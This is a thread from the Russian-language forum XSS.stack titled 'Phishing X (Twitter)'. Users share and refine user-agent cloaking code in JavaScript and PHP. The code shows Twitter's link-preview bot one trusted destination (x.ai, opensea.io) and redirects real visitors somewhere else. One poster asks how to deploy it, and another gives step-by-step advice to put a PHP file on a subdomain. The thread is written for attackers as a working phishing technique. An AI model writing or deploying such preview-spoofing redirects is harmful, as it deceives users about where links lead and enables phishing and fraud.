• XSS.stack #1 – первый литературный журнал от юзеров форума

Фишинг X (Twitter)

Wolverine

(L2) cache
Пользователь
Регистрация
18.01.2022
Сообщения
411
Реакции
257
Гарант сделки
4
Twitterbot переходит к опубликованной ссылке и просматривает заголовок ответа Location, чтобы получить «настоящий» URL-адрес (в случае перенаправления). Вот почему опубликованный URL-адрес не обязательно должен совпадать с URL-адресом изображения, вы можете просто использовать подход, подобный примеру в /api/index.js (показанный ниже), чтобы имитировать перенаправление на URL-адрес, на который вы на самом деле не перенаправляете.
JavaScript:
// Shows the x.ai OG image & URL in the tweet, but actually redirects to ChatGPT
app.get("/", (req, res) => {
    if (req.headers["user-agent"].includes("Twitterbot")) {
        res.setHeader("Location", "https://x.ai");

        return;
    }

    res.redirect(301, "https://chat.openai.com");
});

 
Twitterbot переходит к опубликованной ссылке и просматривает заголовок ответа Location, чтобы получить «настоящий» URL-адрес (в случае перенаправления). Вот почему опубликованный URL-адрес не обязательно должен совпадать с URL-адресом изображения, вы можете просто использовать подход, подобный примеру в /api/index.js (показанный ниже), чтобы имитировать перенаправление на URL-адрес, на который вы на самом деле не перенаправляете.
JavaScript:
// Shows the x.ai OG image & URL in the tweet, but actually redirects to ChatGPT
app.get("/", (req, res) => {
    if (req.headers["user-agent"].includes("Twitterbot")) {
        res.setHeader("Location", "https://x.ai");

        return;
    }

    res.redirect(301, "https://chat.openai.com");
});

Как им воспользоваться?
Создал в папке index.js, вставил код. При переходе в папку показывает файлы находящиеся в папке, при переходе на index.js - открывает статистическую страницу с кодом.

Подскажите кто хоть чуток шарит в код и запуск.
 
Как им воспользоваться?
Создал в папке index.js, вставил код. При переходе в папку показывает файлы находящиеся в папке, при переходе на index.js - открывает статистическую страницу с кодом.

Подскажите кто хоть чуток шарит в код и запуск.
проще через php сделать, создаешь index.php, туда вставляешь
PHP:
<?php

if (stristr($_SERVER['HTTP_USER_AGENT'], 'twitterbot') ){
header("Location: https://opensea.io");
exit();
} else {
header("Location: https://google.com");
exit();
}

?>

создай поддомен только и туда файл закинь
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх